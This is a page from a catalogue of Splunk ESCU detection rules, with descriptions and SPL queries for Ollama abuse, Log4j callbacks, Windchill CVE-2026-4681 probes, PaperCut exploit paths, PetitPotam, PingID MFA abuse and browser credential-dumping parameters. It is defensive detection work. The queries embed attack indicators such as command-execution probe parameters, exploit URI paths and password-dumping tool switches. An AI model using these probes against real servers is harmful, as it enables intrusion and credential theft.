Tool
Splunk ESCU
2,101 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
◈
Detections
50 shown of 2,101Ollama Possible Memory Exhaustion Resource Abuse
Detects abnormal memory allocation patterns and excessive runner operations in Ollama that may indicate resource exhaustion attacks, memory abuse through malicious model loading, or attempts to degrade system performance by overwhelming GPU/CPU resources. Adversaries may deliberately load multiple large models, trigger repeated model initialization cycles, or exploit memory allocation mechanisms to exhaust available system resources, causing denial of service conditions or degrading performance for legitimate users.
Show query
`ollama_server` ("*llama_kv_cache*" OR "*compute buffer*" OR "*llama runner started*" OR "*loaded runners*") | rex field=_raw "count=(?<runner_count>\d+)" | rex field=_raw "size\s*=\s*(?<memory_mb>[\d\.]+)\s+MiB" | rex field=_raw "started in\s*(?<load_time>[\d\.]+)\s*seconds" | rex field=_raw "source=(?<code_source>[^\s]+)" | bin _time span=5m | stats count as operations, sum(runner_count) as total_runners, dc(code_source) as unique_sources, values(code_source) as code_sources, avg(memory_mb) as avg_memory, max(memory_mb) as max_memory, sum(memory_mb) as total_memory, avg(load_time) as avg_load_time, max(load_time) as max_load_time by _time, host | where operations > 5 OR total_runners > 0 OR max_memory > 400 OR total_memory > 500 | eval avg_memory=round(avg_memory, 2) | eval max_memory=round(max_memory, 2) | eval total_memory=round(total_memory, 2) | eval avg_load_time=round(avg_load_time, 2) | eval severity=case( max_memory > 500 OR total_memory > 1000, "critical", max_memory > 400 OR operations > 20, "high", operations > 10, "medium", 1=1, "low" ) | eval attack_type="Resource Exhaustion / Memory Abuse" | sort -_time | table _time, host, operations, total_runners, unique_sources, avg_memory, max_memory, total_memory, avg_load_time, max_load_time, severity, attack_type | `ollama_possible_memory_exhaustion_resource_abuse_filter`Ollama Possible Model Exfiltration Data Leakage
Detects data leakage and exfiltration attempts targeting Ollama model metadata and configuration endpoints. Adversaries repeatedly query /api/show, /api/tags, and /api/v1/models to systematically extract sensitive model information including architecture details, fine-tuning parameters, system paths, Modelfile configurations, and proprietary customizations. Multiple inspection attempts within a 15-minute window indicate automated exfiltration of valuable intellectual property such as custom model configurations, system prompts, and internal model specifications. This activity represents unauthorized data disclosure that could enable competitive intelligence gathering, model replication, or preparation for advanced attacks against the AI infrastructure.
Show query
`ollama_server` | rex field=_raw "\|\s+(?<status_code>\d+)\s+\|\s+(?<response_time>[\d\.]+)s\s+\|\s+(?<src_ip>[\:\da-f\.]+)\s+\|\s+(?<http_method>\w+)\s+\"(?<uri_path>[^\"]+)\"" | eval src=src_ip | eval dest=uri_path | where response_time > 55 | bin _time span=15m | stats count, avg(response_time) as avg_response_time, max(response_time) as max_response_time by _time, src, dest, uri_path | eval avg_response_time=round(avg_response_time, 2) | eval max_response_time=round(max_response_time, 2) | eval severity=case( avg_response_time > 50, "high", avg_response_time > 40, "medium", 1=1, "low" ) | eval attack_type="Potential Data Exfiltration" | sort -_time | stats count by _time, src, uri_path, avg_response_time, max_response_time, severity, attack_type | `ollama_possible_model_exfiltration_data_leakage_filter`
Ollama Possible RCE via Model Loading
Detects Ollama server errors and failures during model loading operations that may indicate malicious model injection, path traversal attempts, or exploitation of model loading mechanisms to achieve remote code execution. Adversaries may attempt to load specially crafted malicious models or exploit vulnerabilities in the model loading process to execute arbitrary code on the server. This detection monitors error messages and failure patterns that could signal attempts to abuse model loading functionality for malicious purposes.
Show query
`ollama_server` level=ERROR ("*llama runner*" OR "*model*" OR "*server.go*" OR "*exited*") | rex field=_raw "source=(?<code_source>[^\s]+)" | rex field=_raw "msg=\"(?<msg>[^\"]+)\"" | rex field=_raw "err=\"(?<err>[^\"]+)\"" | rex field=_raw "level=(?<log_level>\w+)" | eval error_type=case( match(_raw, "exited"), "service_crash", match(_raw, "model"), "model_error", match(_raw, "llama runner"), "runner_error", 1=1, "unknown_error" ) | bin _time span=1h | stats count as error_count, earliest(_time) as first_error, latest(_time) as last_error, values(msg) as error_messages, values(err) as error_details, values(code_source) as code_sources, values(error_type) as error_types, dc(error_type) as unique_error_types by host | where error_count > 0 | eval first_error=strftime(first_error, "%Y-%m-%d %H:%M:%S") | eval last_error=strftime(last_error, "%Y-%m-%d %H:%M:%S") | eval severity=case( match(error_details, "exit status") OR error_count > 5, "critical", error_count > 2, "high", 1=1, "medium" ) | eval attack_type="Suspicious Model Loading / Potential RCE" | stats count by first_error, last_error, host, code_sources, error_count, unique_error_types, error_types, error_messages, error_details, severity, attack_type | `ollama_possible_rce_via_model_loading_filter`Ollama Suspicious Prompt Injection Jailbreak
Detects potential prompt injection or jailbreak attempts against Ollama API endpoints by identifying requests with abnormally long response times. Attackers often craft complex, layered prompts designed to bypass AI safety controls, which typically result in extended processing times as the model attempts to parse and respond to these malicious inputs. This detection monitors /api/generate and /api/chat endpoints for requests exceeding 30 seconds, which may indicate sophisticated jailbreak techniques, multi-stage prompt injections, or attempts to extract sensitive information from the model.
Show query
`ollama_server` "GIN" ("*/api/generate*" OR "*/v1/chat/completions*") | rex field=_raw "\|\s+(?<status_code>\d+)\s+\|\s+(?<response_time>[\d\.]+[a-z]+)\s+\|\s+(?<src_ip>[\:\da-f\.]+)\s+\|\s+(?<http_method>\w+)\s+\"(?<uri_path>[^\"]+)\"" | rex field=response_time "^(?:(?<minutes>\d+)m)?(?<seconds>[\d\.]+)s$" | eval response_time_seconds=if(isnotnull(minutes), tonumber(minutes)*60+tonumber(seconds), tonumber(seconds)) | eval src=src_ip | where response_time_seconds > 30 | bin _time span=10m | stats count as long_request_count, avg(response_time_seconds) as avg_response_time, max(response_time_seconds) as max_response_time, values(uri_path) as uri_path, values(status_code) as status_codes by _time, src, host | where long_request_count > 170 | eval avg_response_time=round(avg_response_time, 2) | eval max_response_time=round(max_response_time, 2) | eval severity=case( long_request_count > 50 OR max_response_time > 55, "critical", long_request_count > 20 OR max_response_time > 40, "high", 1=1, "medium" ) | eval attack_type="Potential Prompt Injection / Jailbreak" | table _time, host, src, uri_path, long_request_count, avg_response_time, max_response_time, status_codes, severity, attack_type | `ollama_suspicious_prompt_injection_jailbreak_filter`Outbound Network Connection from Java Using Default Ports
The following analytic detects outbound network connections from Java processes to default ports used by LDAP and RMI protocols, which may indicate exploitation of the CVE-2021-44228-Log4j vulnerability.
This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs.
Monitoring this activity is crucial as it can signify an attacker's attempt to perform JNDI lookups and retrieve malicious payloads.
If confirmed malicious, this activity could lead to remote code execution and further compromise of the affected server.
Show query
| tstats `security_content_summariesonly` count
FROM datamodel=Endpoint.Processes WHERE
Processes.process_name IN (
"java.exe",
"javaw.exe"
)
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| join process_id dest
[
| tstats `security_content_summariesonly` count
FROM datamodel=Network_Traffic.All_Traffic WHERE
All_Traffic.dest_port IN (
389,
636,
1099,
1389
)
BY All_Traffic.action All_Traffic.app All_Traffic.bytes
All_Traffic.bytes_in All_Traffic.bytes_out All_Traffic.dest
All_Traffic.dest_ip All_Traffic.dest_port All_Traffic.dvc
All_Traffic.protocol All_Traffic.protocol_version All_Traffic.src
All_Traffic.src_ip All_Traffic.src_port All_Traffic.transport
All_Traffic.user All_Traffic.vendor_product All_Traffic.direction
All_Traffic.process_id
| `drop_dm_object_name(All_Traffic)`
| rename dest as connection_to_CNC
| rename src as dest
]
| table _time dest
parent_process_path parent_process_name parent_process
process_path process_name process process_hash
connection_to_CNC dest_port user
| `outbound_network_connection_from_java_using_default_ports_filter`Overwriting Accessibility Binaries
The following analytic detects modifications to Windows accessibility binaries such as sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe, and AtBroker.exe. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify changes to these specific files. This activity is significant because adversaries can exploit these binaries to gain unauthorized access or execute commands without logging in. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized system access and further compromise of the environment.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*) by Filesystem.action Filesystem.dest Filesystem.file_access_time Filesystem.file_create_time Filesystem.file_hash Filesystem.file_modify_time Filesystem.file_name Filesystem.file_path Filesystem.file_acl Filesystem.file_size Filesystem.process_guid Filesystem.process_id Filesystem.user Filesystem.vendor_product | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `overwriting_accessibility_binaries_filter`
PTC Windchill GW READY OK Probe
This analytic detects Windchill MethodServer log4j events that contain the CVE-2026-4681 exploitation probe `run?c=echo%20GW_READY_OK`.
PTC identifies `GW_READY_OK` and related `run?c=` activity as log indicators associated with Windchill and FlexPLM exploitation.
This behavior is significant because attackers use the probe to confirm that a staged gateway component is reachable before sending operating system commands through the same `c=` parameter.
Show query
`windchill_log4j`
("GW_READY_OK" OR "run?c=echo%20GW_READY_OK" OR "c=echo%20GW_READY_OK")
| rex field=_raw "^(?:[^:\r\n]+:)?(?<log_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2},\d{3})\s+(?<log_level>\w+)\s+\[(?<thread>[^\]]+)\]\s+(?<logger>\S+)\s+-\s+(?<payload>.*)$"
| search logger IN ("wt.servlet.ServletRequestMonitor.request", "wt.method.MethodContextMonitor.contexts.servletRequest")
| rex field=payload "^(?<event_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\.\d{3})\s+(?<event_tz>[+\-]\d{4}),\s+(?<rest>.*)$"
| eval parts=split(rest,", ")
| eval event_type=case(logger="wt.servlet.ServletRequestMonitor.request","servlet_request",logger="wt.method.MethodContextMonitor.contexts.servletRequest","method_context_servlet_request",true(),"other")
| eval src_ip=case(event_type="servlet_request",mvindex(parts,2),event_type="method_context_servlet_request",mvindex(parts,5))
| eval uri_path=case(event_type="servlet_request",mvindex(parts,3),event_type="method_context_servlet_request",mvindex(parts,8))
| eval query_string=if(event_type="servlet_request",mvindex(parts,4),null())
| eval http_method=if(event_type="servlet_request",mvindex(parts,5),null())
| eval status=if(event_type="servlet_request",tonumber(mvindex(parts,6)),null())
| rex field=uri_path "^(?<uri_only>[^\?]+)(?:\?(?<uri_query>.*))?$"
| eval query_string=if(query_string="-",null(),query_string)
| eval query_string=coalesce(query_string,uri_query)
| rex field=query_string "(?i)(?:^|&)(?<query_param>[cp])=(?<query_value>[^&]*)"
| eval query_param=lower(query_param), query_value=urldecode(replace(query_value,"\+","%20"))
| where query_param="c" AND match(query_value,"(?i)^echo(\s|20)+GW_READY_OK$")
| eval src=src_ip, activity="gw_ready_ok_probe"
| stats count min(_time) as firstTime
max(_time) as lastTime
values(log_level) as log_level
values(logger) as logger
values(http_method) as http_method
values(status) as status
values(uri_only) as uri_path
values(query_string) as query_string
by src activity query_param query_value
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ptc_windchill_gw_ready_ok_probe_filter`PTC Windchill Gateway Command Execution
This analytic detects Windchill MethodServer log4j events showing suspicious `c=` command execution or `p=` file read parameters sent to Windchill gateway paths associated with CVE-2026-4681 exploitation.
PTC identifies `run?c=`, `run?p=`, `.jsp?c=`, and `.jsp?p=` request patterns as indicators to monitor during Windchill and FlexPLM exploitation response.
Successful activity may allow an unauthenticated attacker to execute operating system commands or read files through a weaponized gateway or JSP component.
Show query
`windchill_log4j`
("WindchillGW/GW/run" OR "WindchillAuthGW/GW/run" OR "/GW/run?" OR "run?c=" OR "run?p=" OR ".jsp?c=" OR ".jsp?p=" OR "dpr_")
| rex field=_raw "^(?:[^:\r\n]+:)?(?<log_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2},\d{3})\s+(?<log_level>\w+)\s+\[(?<thread>[^\]]+)\]\s+(?<logger>\S+)\s+-\s+(?<payload>.*)$"
| search logger IN ("wt.servlet.ServletRequestMonitor.request", "wt.method.MethodContextMonitor.contexts.servletRequest")
| rex field=payload "^(?<event_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\.\d{3})\s+(?<event_tz>[+\-]\d{4}),\s+(?<rest>.*)$"
| eval parts=split(rest,", ")
| eval event_type=case(logger="wt.servlet.ServletRequestMonitor.request","servlet_request",logger="wt.method.MethodContextMonitor.contexts.servletRequest","method_context_servlet_request",true(),"other")
| eval src_ip=case(event_type="servlet_request",mvindex(parts,2),event_type="method_context_servlet_request",mvindex(parts,5))
| eval uri_path=case(event_type="servlet_request",mvindex(parts,3),event_type="method_context_servlet_request",mvindex(parts,8))
| eval query_string=if(event_type="servlet_request",mvindex(parts,4),null())
| eval http_method=if(event_type="servlet_request",mvindex(parts,5),null())
| eval status=if(event_type="servlet_request",tonumber(mvindex(parts,6)),null())
| rex field=uri_path "^(?<uri_only>[^\?]+)(?:\?(?<uri_query>.*))?$"
| eval query_string=if(query_string="-",null(),query_string)
| eval query_string=coalesce(query_string,uri_query)
| rex field=query_string "(?i)(?:^|&)(?<query_param>[cp])=(?<query_value>[^&]*)"
| eval query_param=lower(query_param), query_value=urldecode(replace(query_value,"\+","%20"))
| where isnotnull(uri_only) AND isnotnull(query_param)
| where (match(uri_only,"(?i)(^|/)GW/run$") OR match(uri_only,"(?i)/servlet/(WindchillGW|WindchillAuthGW)/GW/run$") OR match(uri_only,"(?i)(^|/)dpr_[0-9a-f]{8}\.jsp$")) AND (query_param="c" OR query_param="p")
| where NOT (query_param="c" AND match(query_value,"(?i)^echo(\s|20)+GW_READY_OK$"))
| eval activity=case(query_param="c","command_execution_parameter",query_param="p","file_read_parameter",true(),"unknown")
| eval src=src_ip
| stats count min(_time) as firstTime
max(_time) as lastTime
values(log_level) as log_level
values(logger) as logger
values(http_method) as http_method
values(status) as status
values(uri_only) as uri_path
values(query_string) as query_string
by src activity query_param query_value
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ptc_windchill_gateway_command_execution_filter`PaperCut NG Remote Web Access Attempt
The following analytic detects potential exploitation attempts on publicly accessible PaperCut NG servers.
It identifies connections from public IP addresses to the server, specifically monitoring URI paths commonly used in proof-of-concept scripts for exploiting PaperCut NG vulnerabilities.
This detection leverages web traffic data from the `Web` datamodel, focusing on specific URI paths and excluding internal IP ranges.
This activity is significant as it may indicate an attempt to exploit known vulnerabilities in PaperCut NG, potentially leading to unauthorized access or control of the server.
If confirmed malicious, attackers could gain administrative access, leading to data breaches or further network compromise.
Show query
| tstats `security_content_summariesonly`
count min(_time) as firstTime
max(_time) as lastTime
from datamodel=Web WHERE
Web.url IN (
"*/app?service=direct/1/PrinterDetails/printerOptionsTab.tab"
"*/app?service=direct/1/PrinterList/selectPrinter&sp=*",
"*/app?service=page/PrinterList",
"*/app?service=page/SetupCompleted"
)
NOT src IN (
"10.0.0.0/8",
"172.16.0.0/12",
"192.168.0.0/16",
"100.64.0.0/10",
"127.0.0.0/8",
"169.254.0.0/16",
"192.0.0.0/24",
"192.0.0.0/29",
"192.0.0.8/32",
"192.0.0.9/32",
"192.0.0.10/32",
"192.0.0.170/32",
"192.0.0.171/32",
"192.0.2.0/24",
"192.31.196.0/24",
"192.52.193.0/24",
"192.88.99.0/24",
"224.0.0.0/4",
"192.175.48.0/24",
"198.18.0.0/15",
"198.51.100.0/24",
"203.0.113.0/24",
"240.0.0.0/4",
"::1"
)
by Web.http_user_agent Web.http_method
Web.url,Web.url_length Web.src
Web.dest Web.dest_port
| `drop_dm_object_name("Web")`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `papercut_ng_remote_web_access_attempt_filter`
PaperCut NG Suspicious Behavior Debug Log
The following analytic identifies potential exploitation attempts on a PaperCut NG server by analyzing its debug log data. It detects unauthorized or suspicious access attempts from public IP addresses and searches for specific URIs associated with known exploits. The detection leverages regex to parse unstructured log data, focusing on admin login activities. This activity is significant as it can indicate an active exploitation attempt on the server. If confirmed malicious, attackers could gain unauthorized access, potentially leading to data breaches or further compromise of the server.
Show query
`papercutng` (loginType=Admin OR userName=admin) | eval uri_match=if(match(_raw, "(?i)(\/app\?service=page\/SetupCompleted|\/app|\/app\?service=page\/PrinterList|\/app\?service=direct\/1\/PrinterList\/selectPrinter&sp=l1001|\/app\?service=direct\/1\/PrinterDetails\/printerOptionsTab\.tab)"), "URI matches", null()) | eval ip_match=if(match(_raw, "(?i)((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))") AND NOT match(_raw, "(?i)(10\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(172\.(1[6-9]|2[0-9]|3[0-1])\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(192\.168\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"), "IP matches", null()) | where (isnotnull(uri_match) OR isnotnull(ip_match)) | stats sparkline, count, values(uri_match) AS uri_match, values(ip_match) AS ip_match latest(_raw) BY host, index, sourcetype | `papercut_ng_suspicious_behavior_debug_log_filter`
Permission Modification using Takeown App
The following analytic detects the modification of file or directory permissions using the takeown.exe Windows application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and command-line details. This activity is significant because it is a common technique used by ransomware to take ownership of files or folders for encryption or deletion. If confirmed malicious, this could lead to unauthorized access, data encryption, or data destruction, severely impacting the integrity and availability of critical data.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE Processes.process_name = "takeown.exe" Processes.process = "*/f*"
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `permission_modification_using_takeown_app_filter`PetitPotam Network Share Access Request
The following analytic detects network share access requests indicative of the PetitPotam attack (CVE-2021-36942). It leverages Windows Event Code 5145, which logs attempts to access network share objects. This detection is significant as PetitPotam can coerce authentication from domain controllers, potentially leading to unauthorized access. If confirmed malicious, this activity could allow attackers to escalate privileges or move laterally within the network, posing a severe security risk. Ensure Event Code 5145 is enabled via Group Policy to utilize this analytic effectively.
Show query
`wineventlog_security` SubjectUserName="ANONYMOUS LOGON" EventCode=5145 RelativeTargetName=lsarpc
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest, SubjectUserSid, ShareName,
src, AccessMask, AccessReason
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `petitpotam_network_share_access_request_filter`PetitPotam Suspicious Kerberos TGT Request
The following analytic detects a suspicious Kerberos Ticket Granting Ticket (TGT) request, identified by Event Code 4768. This detection leverages Windows Security Event Logs to identify TGT requests with unusual fields, which may indicate the use of tools like Rubeus following the exploitation of CVE-2021-36942 (PetitPotam). This activity is significant as it can signal an attacker leveraging a compromised certificate to request Kerberos tickets, potentially leading to unauthorized access. If confirmed malicious, this could allow attackers to escalate privileges and persist within the environment, posing a severe security risk.
Show query
`wineventlog_security` EventCode=4768 src!="::1" TargetUserName=*$ CertThumbprint!=""
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest, TargetUserName, src,
action
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `petitpotam_suspicious_kerberos_tgt_request_filter`Ping Sleep Batch Command
The following analytic identifies the execution of ping sleep batch commands.
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process command-line details.
This activity is significant as it indicates an attempt to delay malicious code execution, potentially evading detection or sandbox analysis.
If confirmed malicious, this technique allows attackers to bypass security measures, making it harder to detect and analyze their activities, thereby increasing the risk of prolonged unauthorized access and potential data exfiltration.
Show query
| tstats `security_content_summariesonly`
count min(_time) as firstTime
max(_time) as lastTime
FROM datamodel=Endpoint.Processes WHERE
(
Processes.parent_process= "*ping*"
Processes.parent_process = *-n*
Processes.parent_process IN (
"*& *",
"*&*",
"*&C:*",
"*>*",
"*>*"
)
)
OR
(
(
Processes.process_name= "ping.exe"
OR
Processes.original_file_name= "ping.exe"
)
Processes.process = *-n*
Processes.process IN (
"*& *",
"*&*",
"*&C:*",
"*>*",
"*>*"
)
)
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec
Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name("Processes")`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ping_sleep_batch_command_filter`PingID Mismatch Auth Source and Verification Response
The following analytic identifies discrepancies between the IP address of an authentication event and the IP address of the verification response event, focusing on differences in the originating countries. It leverages JSON logs from PingID, comparing the 'auth_Country' and 'verify_Country' fields. This activity is significant as it may indicate suspicious sign-in behavior, such as account compromise or unauthorized access attempts. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized access to sensitive systems and data.
Show query
`pingid` ("result.status" IN ("SUCCESS*","FAIL*","UNSUCCESSFUL*" ) NOT "result.message" IN ("*pair*","*create*","*delete*")) | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', dest = 'resources{}.ipaddress', reason = 'result.message', object = 'resources{}.devicemodel', status = 'result.status' | join user session_id [ search `pingid` ("result.status" IN ("POLICY") AND "resources{}.ipaddress"=*) AND "result.message" IN("*Action: Authenticate*","*Action: Approve*","*Action: Allowed*") | rex field=result.message "IP Address: (?:N\/A)?(?<policy_ipaddress>.+)?\n" | rex field=result.message "Action: (?:N\/A)?(?<signature>.+)?\n" | rex field=result.message "Requested Application Name: (?:N\/A)?(?<Requested_Application_Name>.+)?\n" | rex field=result.message " Requested Application ID: (?:N\/A)?(?<Requested_Application_ID>.+)?\n" | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', src = coalesce('resources{}.ipaddress',policy_ipaddress), app = coalesce(Requested_Application_ID,Requested_Application_Name) | fields app, user, session_id, src, signature ] | iplocation prefix=auth_ dest | iplocation prefix=verify_ src | stats count min(_time) as firstTime max(_time) as lastTime values(app) as app values(session_id) as session_id by user, dest, auth_Country, src, verify_Country, object, signature, status, reason | where auth_Country != verify_Country | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_mismatch_auth_source_and_verification_response_filter`PingID Multiple Failed MFA Requests For User
The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within a PingID environment. It triggers when 10 or more MFA prompts fail within 10 minutes, using JSON logs from PingID. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. If confirmed malicious, this could lead to unauthorized access, as the user might eventually accept the fraudulent request, compromising the security of the account and potentially the entire network.
Show query
`pingid` "result.status" IN ("FAILURE,authFail","UNSUCCESSFUL_ATTEMPT") | eval time = _time, src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), object = 'resources{}.devicemodel', reason = 'result.message'| bucket span=10m _time | stats dc(_raw) AS mfa_prompts min(time) as firstTime, max(time) as lastTime values(src) as src by user, reason, _time | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | where mfa_prompts >= 10 | `pingid_multiple_failed_mfa_requests_for_user_filter`PingID New MFA Method After Credential Reset
The following analytic identifies the provisioning of a new MFA device shortly after a password reset. It detects this activity by correlating Windows Event Log events for password changes (EventID 4723, 4724) with PingID logs indicating device pairing. This behavior is significant as it may indicate a social engineering attack where a threat actor impersonates a valid user to reset credentials and add a new MFA device. If confirmed malicious, this activity could allow an attacker to gain persistent access to the compromised account, bypassing traditional security measures.
Show query
`pingid` "result.message" = "*Device Paired*" | rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime, values(reason) as reason by src,user,action,object | join type=outer user [| search `wineventlog_security` EventID IN(4723,4724) | eval PW_Change_Time = _time, user = upper(user) | fields user,src_user,EventID,PW_Change_Time] | eval timeDiffRaw = round(lastTime - PW_Change_Time) | eval timeDiff = replace(tostring(abs(timeDiffRaw) ,"duration"),"(\d*)\+*(\d+):(\d+):(\d+)","\2 hours \3 minutes") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `security_content_ctime(PW_Change_Time)` | where timeDiffRaw > 0 AND timeDiffRaw < 3600 | `pingid_new_mfa_method_after_credential_reset_filter`PingID New MFA Method Registered For User
The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs from PingID, specifically looking for successful device pairing events. This activity is significant as adversaries who gain unauthorized access to a user account may register a new MFA method to maintain persistence. If confirmed malicious, this could allow attackers to bypass existing security measures, maintain long-term access, and potentially escalate their privileges within the compromised environment.
Show query
`pingid` "result.message"="Device Paired*" result.status="SUCCESS" | rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_new_mfa_method_registered_for_user_filter`Plain HTTP POST Exfiltrated Data
The following analytic detects potential data exfiltration using plain HTTP POST requests. It leverages network traffic logs, specifically monitoring the `stream_http` data source for POST methods containing suspicious form data such as "wermgr.exe" or "svchost.exe". This activity is significant because it is commonly associated with malware like Trickbot, trojans, keyloggers, or APT adversaries, which use plain text HTTP POST requests to communicate with remote C2 servers. If confirmed malicious, this activity could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further network infiltration.
Show query
`stream_http` http_method=POST form_data IN ("*wermgr.exe*","*svchost.exe*", "*name=\"proclist\"*","*ipconfig*", "*name=\"sysinfo\"*", "*net view*")
| stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count
BY src_ip dest_ip http_method
http_user_agent uri_path url
bytes_in bytes_out
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `plain_http_post_exfiltrated_data_filter`Possible Browser Pass View Parameter
The following analytic identifies processes with command-line parameters associated with web browser credential dumping tools, specifically targeting behaviors used by Remcos RAT malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and specific file paths. This activity is significant as it indicates potential credential theft, a common tactic in broader cyber-espionage campaigns. If confirmed malicious, attackers could gain unauthorized access to sensitive web credentials, leading to further system compromise and data breaches.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*/stext *", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*", "*/LoadPasswordsOpera*", "*/LoadPasswordsSafari*" , "*/UseOperaPasswordFile*", "*/OperaPasswordFile*","*/stab*", "*/scomma*", "*/stabular*", "*/shtml*", "*/sverhtml*", "*/sxml*", "*/skeepass*" ) AND Processes.process IN ("*\\temp\\*", "*\\users\\public\\*", "*\\programdata\\*") by Processes.action Processes.dest Processes.original_file_name Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `possible_browser_pass_view_parameter_filter`Possible Lateral Movement PowerShell Spawn
The following analytic detects the spawning of a PowerShell process as a child or grandchild of commonly abused processes like services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.
